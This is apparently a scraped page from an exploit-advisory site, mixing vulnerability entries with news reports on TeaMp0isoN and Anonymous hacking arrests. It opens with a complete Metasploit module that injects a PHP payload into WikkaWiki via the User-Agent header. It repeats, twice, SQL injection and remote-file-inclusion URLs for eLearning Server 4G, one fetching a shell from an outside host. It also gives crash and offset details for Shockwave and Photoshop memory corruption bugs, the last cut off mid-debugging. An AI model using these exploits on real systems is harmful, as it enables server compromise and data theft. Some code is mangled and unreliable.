News

WikkaWiki 1.3.2 Spam Logging PHP Injection

 Topic:
WikkaWiki 1.3.2 Spam Logging PHP Injection
 Credit:
sinn3r
 Date:
2012.05.12
 CWE:
N/A
 CVE:
CVE-2011-4449 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ‘msf/core’

class Metasploit3 Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
‘Name’ = “WikkaWiki 1.3.2 Spam Logging PHP Injection”,
‘Description’ = %q{
This module exploits a vulnerability found in WikkaWiki. When the spam logging
feature is enabled, it is possible to inject PHP code into the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generating
10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).

Please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as ‘PAGE’.
},
‘License’ = MSF_LICENSE,
‘Author’ =
[
'EgiX', #Initial discovery, PoC
'sinn3r' #Metasploit
],
‘References’ =
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http://wush.net/trac/wikka/ticket/1098']
],
‘Payload’ =
{
‘BadChars’ = “x00″
},
‘DefaultOptions’ =
{
‘ExitFunction’ = “none”
},
‘Arch’ = ARCH_PHP,
‘Platform’ = ['php'],
‘Targets’ =
[
['WikkaWiki 1.3.2 r1814', {}]
],
‘Privileged’ = false,
‘DisclosureDate’ = “Nov 30 2011″,
‘DefaultTarget’ = 0))

register_options(
[
OptString.new('USERNAME', [true, 'WikkaWiki username']),
OptString.new(‘PASSWORD’, [true, 'WikkaWiki password']),
OptString.new(‘PAGE’, [true, 'Page to inject']),
OptString.new(‘TARGETURI’, [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end

def check
res = send_request_raw({
‘method’ = ‘GET’,
‘uri’ = “#{target_uri.path}wikka.php?wakka=HomePage”
})

if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end

#
# Get the cookie before we do any of that login/exploity stuff
#
def get_cookie
res = send_request_raw({
‘method’ = ‘GET’,
‘uri’ = “#{@base}wikka.php”
})

# Get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(w+=w+); path=.+$/).flatten[0]
else
raise RuntimeError, “#{@peer} – No cookie found, will not continue”
end

cookie
end

#
# Do login, and then return the cookie that contains our credential
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = “#{@base}wikka.php?wakka=UserSettings”
res = send_request_raw({
‘method’ = ‘GET’,
‘uri’ = uri,
‘cookie’ = cookie
})

# Extract the hidden fields
login = {}
if res and res.body =~ /div id=”content”.+fieldset
class=”hidden”(.+)\/fieldset.+legendLogin/Register\/legend/m
fields = $1.scan(/input type=”hidden” name=”(w+)” value=”(w+)”
//)
fields.each do |name, value|
login[name] = value
end
else
raise RuntimeError, “#{@peer} – Unable to find the hidden fieldset required for login”
end

# Add the rest of fields required for login
login['action'] = ‘login’
login['name'] = datastore['USERNAME']
login['password'] = datastore['PASSWORD']
login['do_redirect'] = ‘on’
login['submit'] = “Login”
login['confpassword'] = ”
login['email'] = ”

port = (rport.to_i == 80) ? “” : “:#{rport}”
res = send_request_cgi({
‘method’ = ‘POST’,
‘uri’ = uri,
‘cookie’ = cookie,
‘headers’ = { ‘Referer’ = “http://#{rhost}#{port}#{uri}” },
‘vars_post’ = login
})

if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name@w+=w+);/)[0] || “”
pass = res.headers['Set-Cookie'].scan(/(pass@w+=w+)/)[0] || “”
cookie_cred = “#{cookie}; #{user}; #{pass}”
else
cred = “#{datastore['USERNAME']}:#{datastore['PASSWORD']}”
raise RuntimeError, “#{@peer} – Unable to login with “#{cred}”"
end

return cookie_cred
end

#
# After login, we inject the PHP payload
#
def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
‘method’ = ‘GET’,
‘uri’ = “#{@base}wikka.php?wakka=#{datastore['PAGE']}show_comments=1″,
‘cookie’ = cookie
})

fields = {}
if res and res.body =~ /form action=.+processcomment.+fieldset
class=”hidden”(.+)\/fieldset/m
$1.scan(/input type=”hidden” name=”(w+)” value=”(.+)” //).each do
|n, v|
fields[n] = v
end
else
raise RuntimeError, “#{@peer} – Cannot get necessary fields before posting a comment”
end

# Generate enough URLs to trigger spam logging
urls = ”
10.times do |i|
urls “http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}n”
end

# Add more fields
fields['body'] = urls
fields['submit'] = ‘Add’

# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? “” : “:#{rport}”
uri = “#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment”
post_data = “”
send_request_cgi({
‘method’ = ‘POST’,
‘uri’ = “#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment”,
‘cookie’ = cookie,
‘headers’ = { ‘Referer’ = “http://#{rhost}:#{port}/#{uri}” },
‘vars_post’ = fields,
‘agent’ = “?php #{payload.encoded} ?”
})

send_request_raw({
‘method’ = ‘GET’,
‘uri’ = “#{@base}spamlog.txt.php”
})
end

def exploit
@peer = “#{rhost}:#{rport}”

@base = target_uri.path
@base ‘/’ if @base[-1, 1] != ‘/’

print_status(“#{@peer} – Getting cookie”)
cookie = get_cookie

print_status(“#{@peer} – Logging in”)
cred = login(cookie)

print_status(“#{@peer} – Triggering spam logging”)
inject_exec(cred)

handler
end
end

=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka

Open wikka.config.php, do:
‘spam_logging’ = ’1′
=end

[ ASCII VERSION ]

Return to top

TeamPoison Hacker Suspect Has Anonymous Ties

British police Thursday arrested a suspected member of the TeaMp0isoN hacktivist group.

The unnamed 17-year old boy was arrested in the north of England on charges of violating the country’s Computer Misuse Act 1990, which is the law in Britain typically used to charge people who are suspected of hacking offenses.

“The suspect, who is believed to use the online ‘nic’ ‘MLT’, is allegedly a member of and spokesperson for TeaMp0isoN (‘TeamPoison’)–a group which has claimed responsibility for more than 1,400 offences including denial of service and network intrusions where personal and private information has been illegally extracted from victims in the U.K. and around the world,” read a statement released by London’s Metropolitan Police Service. It said that the suspect had been tracked down by the force’s Police Central eCrime Unit (PCeU), which serves as a cyber-crime investigation service for England, Wales, and Northern Ireland.

[ To learn about Anonymous's recent exploits, see Anonymous Target Russian Sites For Putin Protest. ]

Police said they were interviewing the boy at a police station, conducting a forensic analysis of computer equipment seized as part of the arrest, and working to identify additional suspects. “Enquiries continue between the PCeU and other relevant law enforcement agencies in this continuing and wide-ranging investigation,” said the Metropolitan Police.

MLT’s arrest is not the first in the ongoing TeaMp0isoN investigation. Last month, two alleged members of the group–aged 16 and 17 years old–were arrested on charges of having used Skype to overwhelm Britain’s anti-terrorism hotline with bogus calls. Their arrest came one day after a recording of one of the prank calls ended up on YouTube, with the headline, “TriCk calls Mi6 Anti-Terrorism Command – TeaMp0isoN.”

In February, a hacker identifying himself as TriCk said that he was the 17-year-old British co-founder of TeaMp0isoN. Asked about his greatest accomplishment as a hacker, he replied, “My biggest achievement as a hacker is ‘TeaMp0isoN’ – embarrassing governments, corrupt organizations and corrupt individuals for 4+ years straight, and the ‘enemy’ STILL has nothing on us.”

As that suggests, prank calls aside, TeaMp0isoN built its reputation by launching distributed denial-of-service attacks against numerous organizations, as well as “doxing”–obtaining and releasing sensitive information about–numerous businesses, government agencies, and individuals. Notably, the group last year published via Pastebin what it claimed to be Tony Blair’s private address book. A spokesman for the former British prime minister said at the time that the information appeared to have been obtained from the personal email account of one of Blair’s former staff members.

In January 2011, the group exploited a Facebook bug that allowed them to post bogus status updates to roughly 130 different Facebook pages, including pages for the social network’s founder, Mark Zuckerberg, as well as then French president Nicholas Sarkozy.

More recently, TeaMp0isoN defaced and knocked the BlackBerry website offline during the August 2011 riots in England, and attacked the United Nations website in November 2011, leading to the release of various user IDs. That same month, TeaMp0isoN announced that it would be collaborating with Anonymous on the Operation Robin Hood wealth redistribution scheme.

Prior to that endeavor, however, the group’s members had apparently not been fans of certain LulzSec and Anonymous elements, which they accused of having unsophisticated hacking techniques. In July 2011, TeaMp0isoN went so far as to release documents containing supposed personal information about members of the rival hacktivist crews, in an apparent effort to get the LulzSec and Anonymous participants arrested.

InformationWeek is conducting a survey to get a baseline look at where enterprises stand on their IPv6 deployments, with a focus on problem areas, including security, training, budget, and readiness. Upon completion of our survey, you will be eligible to enter a drawing to receive an 16-GB Apple iPad. Take our InformationWeek IPv6 Survey now. Survey ends May 11.

Return to top

eLearning Server 4G Remote File Inclusion / SQL Injection

 Topic:
eLearning Server 4G Remote File Inclusion / SQL Injection
 Dork:
intitle:”eLearning Server”
 Credit:
Eugene Salov
 Date:
2012.05.11
 CWE:
CWE-89 (Show similar)
CWE-98 (Show similar)
 CVE:
N/A

# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:”eLearning Server”
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 “nid” SQL injection:
POC:
/news.php4?nid=-12′+union+select+1,2,LOAD_FILE(‘C:\Program%20Files\Hypermethod\eLearningServer\index.php’),4,5,6,7,8
,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?

References:

[ ASCII VERSION ]

Return to top

eLearning Server 4G Remote File Inclusion / SQL Injection

 Topic:
eLearning Server 4G Remote File Inclusion / SQL Injection
 Dork:
intitle:”eLearning Server”
 Credit:
Eugene Salov
 Date:
2012.05.11
 CWE:
CWE-89 (Show similar)
CWE-98 (Show similar)
 CVE:
N/A

# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:”eLearning Server”
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 “nid” SQL injection:
POC:
/news.php4?nid=-12′+union+select+1,2,LOAD_FILE(‘C:\Program%20Files\Hypermethod\eLearningServer\index.php’),4,5,6,7,8
,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?

References:

[ ASCII VERSION ]

Return to top

Anonymous Targets Russian Sites For Putin Protest

(click image for larger view and for slideshow)
Reinstalled Russian President Vladimir Putin’s March election and Monday inauguration have drawn the ire of more than just Russian political opponents and protestors.

Hacktivists claiming allegiance to Anonymous launched a series of distributed denial-of-service (DDoS) attacks this week against Russian government websites, under the banner of “OpDefiance.”

“kremlin.ru – TANGO DOWN … #OpDefiance #Anonymous #d4th #DDoS #WIN,” read a tweet posted via the Anonymous Op_Russia account. It included links to screenshots showing the targeted websites suffering increasingly longer response times.

[ Online anonymity can lead to dangerous situations, but it also has its advantages. Read more at Has Anonymous Ruined Online Anonymity?. ]

The Kremlin’s press service acknowledged the attacks, which briefly knocked the Kremlin’s public-facing website offline. “We received threats from Anonymous several days ago but we can’t confirm it’s exactly this group that attacked the Kremlin.ru website. At the moment we can’t establish who’s behind the attack. Unfortunately we live at a time when technology security threats have mounted, but we have the means to resist them,” read a statement released by the Kremlin.

The Russian Federal Security Service website was also experiencing intermittent outages Wednesday, reported the English-language Russian news channel RT.com

Anonymous previewed the attacks last week. In a Pastebin post and YouTube clip, Anonymous said the attacks were meant to support the country’s protests against alleged vote tampering during the March elections, which led to Putin being elected to serve another six-year term as president.

“We are going to support the protest by taking down the lying government information resources, the first of which will be the official site of the Russian government, said government having been assembled by way of lies and electoral fraud,” read a statement released by Anonymous.

The call to arms designated two more Russian government websites–gov.ru and government.ru–as targets, including the times they should be attacked, presumably using DDoS tools. But according to RT.com, while those sites were attacked Monday, they didn’t go down.

In other hacktivist news, Norway’s National Criminal Investigation Service (NCIS) said that it’s arrested two teenagers on charges of launching DDoS attacks against numerous financial institutions as well as Britain’s Serious Organized Crime Agency (SOCA), which has investigated alleged illegal activity by Anonymous and LulzSec members. The SOCA website was most recently knocked offline by DDoS attacks last week.

The Norwegian teens, who haven’t been named, are 18 and 19 years old, and police said they launched the attacks over a period of several weeks. Local news reports identified some of their targets as the Norwegian security police service PST, along with DnB bank, the Norwegian Lottery, and Germany’s tabloid newspaper Bild. If convicted, the pair could face up to six years in prison on charges of aggravated criminal damage.

But investigators said they’re still pursuing more suspects. “We have arrested the two people we believe were most central to these attacks, but we are still hoping to speak to more people,” said prosecutor Erik Moestue, reported in the English-language Norwegian newspaper The Local. “We have not yet discovered a motive for the attacks, so we’re assuming that they’re doing it to get a kick or to destroy things for others. They’re a gang of boys.”

The Local also reported that police were aided by the Norwegian branch of Anonymous, which disclosed the identities of the suspects, who they said were part of “a group of 14- to 16-year-olds with very limited computer skills.” Published information reportedly included the suspects’ names, addresses, mobile phone numbers, email addresses, and social network identities.

But a message posted Wednesday on the Anonymous Norway (anonnorway.org) website said such news reports were incorrect: “We at anonnorway has nothing to do with the ongoing investigation NCIS conducts about DDoS attacks against various websites. We have neither ‘outed’ nor exposed people, and we have not been in contact with law enforcement authorities at all. Any article that claims the opposite is sadly misinformed.”

InformationWeek is conducting a survey to get a baseline look at where enterprises stand on their IPv6 deployments, with a focus on problem areas, including security, training, budget, and readiness. Upon completion of our survey, you will be eligible to enter a drawing to receive an 16-GB Apple iPad. Take our InformationWeek IPv6 Survey now. Survey ends May 11.

Return to top

Adobe Shockwave Player .dir Memory Corruption

 Topic:
Adobe Shockwave Player .dir Memory Corruption
 Credit:
Qualys
 Date:
2012.05.10
 CWE:
CWE-119 (Show similar)
 CVE:
CVE-2012-2029 (Show details)
CVE-2012-2030 (Show details)
CVE-2012-2031 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Qualys Vulnerability Malware Research Labs (VMRL)

http://www.dissect.pe

Memory corruption when Adobe Shockwave Player parses .dir media file
CVE-2012-2029

INTRODUCTION

Adobe Shockwave Player is the Adobe plugin to many different browsers
to view rich-media content on the web including animations,
interactive presentations, and online entertainment.

Adobe Shockwave Player does not properly parse .dir media file, which
causes a corruption in module IMLLib by opening a malformed file with
an invalid value located in PoC repro01.dir at offset 0×2306.

This problem was confirmed in the following versions of Adobe
Shockwave Player and MacOS X, other versions may be also affected.

Shockwave Player version 11.6.3r633, Module IMLLib.framework on MacOS
X 10.7.2 (11C74)

CVSS Scoring System

The CVSS score is: 9
Base Score: 10
Temporal Score: 9
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal score is: E:POC/RL:U/RC:C

TRIGGERING THE PROBLEM

To trigger the problem a PoC file (repro01.dir) is available to
interested parties. Use Firefox or Safari to open the file and
reproduce the vulnerability.

DETAILS

Disassembly:

(gdb) disas $pc
Dump of assembler code for function memmove$VARIANT$sse42:
0x991539bd memmove$VARIANT$sse42+0: push %ebp
0x991539be memmove$VARIANT$sse42+1: mov %esp,%ebp
0x991539c0 memmove$VARIANT$sse42+3: push %esi
0x991539c1 memmove$VARIANT$sse42+4: push %edi
0x991539c2 memmove$VARIANT$sse42+5: mov 0×8(%ebp),%edi
0x991539c5 memmove$VARIANT$sse42+8: mov 0xc(%ebp),%esi
0x991539c8 memmove$VARIANT$sse42+11: mov 0×10(%ebp),%ecx
0x991539cb memmove$VARIANT$sse42+14: mov %edi,%edx
0x991539cd memmove$VARIANT$sse42+16: sub %esi,%edx
0x991539cf memmove$VARIANT$sse42+18: cmp %ecx,%edx
0x991539d1 memmove$VARIANT$sse42+20: jb 0x99153a01
memmove$VARIANT$sse42+68
0x991539d3 memmove$VARIANT$sse42+22: cmp $0×50,%ecx
0x991539d6 memmove$VARIANT$sse42+25: ja 0x99153a06
memmove$VARIANT$sse42+73
0x991539d8 memmove$VARIANT$sse42+27: mov %ecx,%edx
0x991539da memmove$VARIANT$sse42+29: shr $0×2,%ecx
0x991539dd memmove$VARIANT$sse42+32: je 0x991539ec
memmove$VARIANT$sse42+47
0x991539df memmove$VARIANT$sse42+34: mov (%esi),%eax —– Crash
here

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x3f5d8935
0x991539df in memmove$VARIANT$sse42 ()
(gdb) bt
#0 0x991539df in memmove$VARIANT$sse42 ()
#1 0x0452eb61 in imPostQuitMessage ()
#2 0x045079f5 in imMemCopy ()
#3 0x070f414d in VListGetNumEntries ()
#4 0x0700b93a in TELscriptRef_GetPropertyInitsAsHandle ()
#5 0x0709b6b3 in MovieMemoryDispose ()
#6 0x0703d409 in TELscriptRef_GetPropertyInitsAsHandle ()
#7 0x0703db71 in TELscriptRef_GetPropertyInitsAsHandle ()
#8 0x0705e4f5 in mmpRewind ()
#9 0x06fa1970 in MovieInstLoadMovie ()
#10 0x01f51f89 in main ()
#11 0x01f526fa in main ()
#12 0x04531a64 in imNPMessageHandleMacEvent ()
#13 0x01f507cf in main ()
#14 0x01f535d0 in main ()
#15 0x01f48bcc in dyld_stub_Gestalt ()
#16 0x996bedd9 in CAOpenGLLayerDraw ()
#17 0x996be842 in -[CAOpenGLLayer _display] ()
#18 0x9968dff5 in CA::Layer::display ()
#19 0x9968df11 in -[CALayer display] ()
#20 0x99685aec in CA::Layer::display_if_needed ()
#21 0×99684883 in CA::Context::commit_transaction ()
#22 0×99684594 in CA::Transaction::commit ()
#23 0x996843f8 in +[CATransaction commit] ()
#24 0x010838dd in nsCARenderer::Render ()
Previous frame inner to this frame (gdb could not unwind past this frame)
(gdb) x/i $pc
0x991539df memmove$VARIANT$sse42+34: mov (%esi),%eax
(gdb) i r $esi $eax
esi 0x3f5d8935 1063094581
eax 0×4 4

CREDITS

This vulnerability was discovered by Rodrigo Rubira Branco
(http://twitter.com/bsdaemon) from the Qualys Vulnerability Malware
Research Labs (VMRL).

========================================================================

ADVISORY 2:

Qualys Vulnerability Malware Research Labs (VMRL)

http://www.dissect.pe

Memory corruption when Adobe Shockwave Player parses .dir media file
CVE-2012-2030

INTRODUCTION

Adobe Shockwave Player is the Adobe plugin to many different browsers
to view rich-media content on the web including animations,
interactive presentations, and online entertainment.

Adobe Shockwave Player does not properly parse .dir media file, which
causes a corruption in module DPLib by opening a malformed file with
an invalid value located in PoC repro02.dir at offset 0x36A4.

This problem was confirmed in the following versions of Adobe
Shockwave Player and MacOS X, other versions may be also affected.

Shockwave Player version 11.6.3r633, Module DPLib.framework on MacOS X
10.7.2 (11C74)

CVSS Scoring System

The CVSS score is: 9
Base Score: 10
Temporal Score: 9
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal score is: E:POC/RL:U/RC:C

TRIGGERING THE PROBLEM

To trigger the problem a PoC file (repro02.dir) is available to
interested parties. Use Firefox or Safari to open the file and
reproduce the vulnerability.

DETAILS

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0×90000004
0x0714b9db in MovieMemoryDispose ()
(gdb) bt
#0 0x0714b9db in MovieMemoryDispose ()
#1 0x0714d329 in MovieMemoryDispose ()
#2 0x0715b778 in MovieMemoryDispose ()
#3 0x0715be15 in MovieMemoryDispose ()
#4 0x0706964a in TELscriptRef_GetPropertyInitsAsHandle ()
#5 0x070697e8 in TELscriptRef_GetPropertyInitsAsHandle ()
#6 0x0706a579 in TELscriptRef_GetPropertyInitsAsHandle ()
#7 0x0706b82d in TELscriptRef_GetPropertyInitsAsHandle ()
#8 0×07065691 in TETourGetCpuHogTicks ()
#9 0x0700c684 in MovieInstAnimIdle ()
#10 0x01f524f4 in main ()
#11 0x01f526fa in main ()
#12 0x055e8a64 in imNPMessageHandleMacEvent ()
#13 0x01f507cf in main ()
#14 0x01f535d0 in main ()
#15 0x01f48bcc in dyld_stub_Gestalt ()
#16 0x996bedd9 in CAOpenGLLayerDraw ()
#17 0x996be842 in -[CAOpenGLLayer _display] ()
#18 0x9968dff5 in CA::Layer::display ()
#19 0x9968df11 in -[CALayer display] ()
#20 0x99685aec in CA::Layer::display_if_needed ()
#21 0×99684883 in CA::Context::commit_transaction ()
#22 0×99684594 in CA::Transaction::commit ()
#23 0x99683b29 in CA::Transaction::observer_callback ()
#24 0x96f697be in
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ ()
#25 0x96f696fd in __CFRunLoopDoObservers ()
#26 0x96f3b917 in CFRunLoopRunSpecific ()
#27 0x96f3b798 in CFRunLoopRunInMode ()
#28 0x95638a7f in RunCurrentEventLoopInMode ()
#29 0x9563fd9b in ReceiveNextEventCommon ()
#30 0x9563fc0a in BlockUntilNextEventMatchingListInMode ()
#31 0x95c8c040 in _DPSNextEvent ()
#32 0x95c8b8ab in -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] ()
#33 0x95c87c22 in -[NSApplication run] ()
#34 0x01036dd9 in nsXPTCStubBase::Stub249 ()
(gdb) x/i $pc
0x714b9db MovieMemoryDispose+445486: incl 0×4(%eax)
(gdb) i r $eax
eax 0×90000000 -1879048192

CREDITS

This vulnerability was discovered by Rodrigo Rubira Branco
(http://twitter.com/bsdaemon) from the Qualys Vulnerability Malware
Research Labs (VMRL).

====================================================================

ADVISORY 3:

Qualys Vulnerability Malware Research Labs (VMRL)

http://www.dissect.pe

Memory corruption when Adobe Shockwave Player parses .dir media file
CVE-2012-2031

INTRODUCTION

Adobe Shockwave Player is the Adobe plugin to many different browsers
to view rich-media content on the web including animations,
interactive presentations, and online entertainment.

Adobe Shockwave Player does not properly parse .dir media file, which
causes a corruption in module IMLLib by opening a malformed file with
an invalid value located in PoC repro03.dir at offset 0x3AD1 and 0x3AD5.

This problem was confirmed in the following versions of Adobe
Shockwave Player and MacOS X, other versions may be also affected.

Shockwave Player version 11.6.3r633, Module IMLLib.framework on MacOS
X 10.7.2 (11C74)

CVSS Scoring System

The CVSS score is: 9
Base Score: 10
Temporal Score: 9
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal score is: E:POC/RL:U/RC:C

TRIGGERING THE PROBLEM

To trigger the problem a PoC file (repro03.dir) is available to
interested parties. Use Firefox or Safari to open the file and
reproduce the vulnerability.

DETAILS

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0×00000009
0x045081fb in imMemDisposalCallbackControl ()
(gdb) bt
#0 0x045081fb in imMemDisposalCallbackControl ()
#1 0x070f47fd in VListGetNumEntries ()
#2 0x070e9aa7 in MovieMemoryDispose ()
#3 0x070e22d4 in MovieMemoryDispose ()
#4 0x070e2329 in MovieMemoryDispose ()
#5 0x070f0778 in MovieMemoryDispose ()
#6 0x070f0e15 in MovieMemoryDispose ()
#7 0x06ffe64a in TELscriptRef_GetPropertyInitsAsHandle ()
#8 0x06ffe7e8 in TELscriptRef_GetPropertyInitsAsHandle ()
#9 0x06fff579 in TELscriptRef_GetPropertyInitsAsHandle ()
#10 0x0700082d in TELscriptRef_GetPropertyInitsAsHandle ()
#11 0x06ffa691 in TETourGetCpuHogTicks ()
#12 0x06fa1684 in MovieInstAnimIdle ()
#13 0x01f524f4 in main ()
#14 0x01f526fa in main ()
#15 0x04531a64 in imNPMessageHandleMacEvent ()
#16 0x01f507cf in main ()
#17 0x01f535d0 in main ()
#18 0x01f48bcc in dyld_stub_Gestalt ()
#19 0x996bedd9 in CAOpenGLLayerDraw ()
#20 0x996be842 in -[CAOpenGLLayer _display] ()
#21 0x9968dff5 in CA::Layer::display ()
#22 0x9968df11 in -[CALayer display] ()
#23 0x99685aec in CA::Layer::display_if_needed ()
#24 0×99684883 in CA::Context::commit_transaction ()
#25 0×99684594 in CA::Transaction::commit ()
#26 0x99683b29 in CA::Transaction::observer_callback ()
#27 0x96f697be in
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ ()
#28 0x96f696fd in __CFRunLoopDoObservers ()
#29 0x96f3b917 in CFRunLoopRunSpecific ()
#30 0x96f3b798 in CFRunLoopRunInMode ()
#31 0x95638a7f in RunCurrentEventLoopInMode ()
#32 0x9563fd9b in ReceiveNextEventCommon ()
#33 0x9563fc0a in BlockUntilNextEventMatchingListInMode ()
#34 0x95c8c040 in _DPSNextEvent ()
#35 0x95c8b8ab in -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] ()
#36 0x95c87c22 in -[NSApplication run] ()
#37 0x01036dd9 in nsXPTCStubBase::Stub249 ()
(gdb) x/i $pc
0x45081fb imMemDisposalCallbackControl+117: movzwl 0×8(%edx),%eax
(gdb) i r $edx $eax
edx 0×1 1
eax 0xbfffaa0c -1073763828

CREDITS

This vulnerability was discovered by Rodrigo Rubira Branco
(http://twitter.com/bsdaemon) from the Qualys Vulnerability Malware
Research Labs (VMRL).

References:

[ ASCII VERSION ]

Return to top

Adobe Photoshop EXTENDED parsing TIF heap buffer overflow vulnerability

 Topic:
Adobe Photoshop EXTENDED parsing TIF heap buffer overflow vulnerability
 Credit:
VulnHunt
 Date:
2012.05.09
 CWE:
CWE-119 (Show similar)
 CVE:
CVE-2012-2028 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Adobe Photoshop EXTENDED parsing TIF heap buffer overflow vulnerability

Discover: nine8 of code audit labs of vulnhunt.com with vulnhunt Fuzzing
CAL: CAL-2011-0073;

CVE:CVE-2012-2028

1 Affected Products
=================
Adobe Photoshop EXTENDED CS5 12.0
Adobe Photoshop EXTENDED CS5.1 12.1

2 Vulnerability Details
=====================
There are some problems when Photoshop parsing tif file. If Compression
Tag(0×100) is
replaced with ImageWidth Tag(0×100) or ImageLength Tag(0×101), the copy dest
heap size is
calculated with ImageWidth(replaced), ImageLength, SamplePerPixel or
ImageLength(replaced),
ImageWidth, SamplePerPixel, when copying strip bytes. This will cause heap overflow.

3 Analysis
=========

COPY Size: StripByteCounts file offset 0×144 (dword)
COPY Src : StripOffsets file offset 0×134 (dword)
COPY Dst Heap Size: ImageLength * ImageWidth(Vuln Seg) * SamplesPerPixel Or
ImageLength(Vuln Seg) * ImageWidth * SamplesPerPixel

ImageLength Value file offset 0×2A (word)
ImageWidth Value(be replaced) file offset 0×42 (word)
SamplesPerPixel Value file offset 0×72 (word)

IDA View: Photoshop.exe(12.0), IDA ImageBase: 0×400000

.text:01BF0250
.text:01BF0250 ; int __cdecl t_memcpy(void *Src, void *Dst, size_t Size)
.text:01BF0250 _t_memcpy proc near
.text:01BF0250 ; sub_6B7780+1F6p …
.text:01BF0250
.text:01BF0250 Src = dword ptr 4
.text:01BF0250 Dst = dword ptr 8
.text:01BF0250 Size = dword ptr 0Ch
.text:01BF0250
.text:01BF0250 mov eax, [esp+Size]
.text:01BF0254 mov ecx, [esp+Src]
.text:01BF0258 mov edx, [esp+Dst]
.text:01BF025C push eax ; Size
.text:01BF025D push ecx ; Src
.text:01BF025E push edx ; Dst
.text:01BF025F call memcpy
.text:01BF0264 add esp, 0Ch
.text:01BF0267 retn
.text:01BF0267 _t_memcpy endp

.text:00F5294F push edi ; int
.text:00F52950 movzx edi, word ptr [esi+0Ch]
.text:00F52954 push edi ; int
.text:00F52955 movzx edi, word ptr [esi+58h]
.text:00F52959 push edi ; __int16
.text:00F5295A movzx edi, word ptr [esi+0Eh]
.text:00F5295E push edi ; int
.text:00F5295F movzx edi, word ptr [esi+6]
.text:00F52963 push edi ; __int16
.text:00F52964 push ecx ; int
.text:00F52965 mov ecx, [esp+4Ch+arg_Size] ; ecx = arg0
.text:00F52969 push edx ; int
.text:00F5296A mov edx, [esp+50h+arg_8] ; edx = arg8
.text:00F5296E push ecx ; arg_size
.text:00F5296F push edx ; arg_dst
.text:00F52970 push eax ; arg_src, from file
.text:00F52971 call _t_CallBugMemcpyFunc ; lt;—– call bug memcpy func
.text:00F52977 movzx eax, ax
.text:00F5297A add esp, 30h

Windbg Debug

1) Attach photoshop.exe process.
2) set breakpoint, at 00F52971 call _t_CallBugMemcpyFunc
0:018gt; bu photoshop + 00b52971

3) Breakpoint 2 hit
eax=18943008 ebx=111a0028 ecx=00006660 edx=0c2203c0 esi=0012eee0 edi=00000001
eip=00f52971 esp=0012e6ec ebp=153a6360 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00240202
Photoshop+0xb52971:
00f52971 ff1578881902 call dword ptr [Photoshop!boost::serialization::s
ingletonlt;std::multisetlt;boost::serialization::extended_type_info const *,boost
::serialization::detail::key_compare,std::allocatorlt;boost::serialization::exte
nded_type_info const *gt; gt; gt;::get_const_instance+0x546f78 (02198878)] ds:0023:0
2198878=0045bff0

#copy arguments
0:000gt; dd esp
(src) (dst) (size)
0012e6ec 18943008 0c2203c0 00006660 000000ae
0012e6fc 00000002 00000001 00000002 00000002
0012e70c 00000001 00000008 00000005 111a0028
0012e71c d56de0ac 0000897e 0012eee0 00000000
0012e72c 00006660 4084d555 01e3a8d4 153a6360
0012e73c 0012ea64 01d2d896 00000007 00f52ca9
0012e74c 00006660 111a0028 0c2203c0 00000000
0012e75c 0012eee0 0012ea70 00000000 0000015c

#copy dest heap size
0:000gt; !heap -p -a 0c2203c0
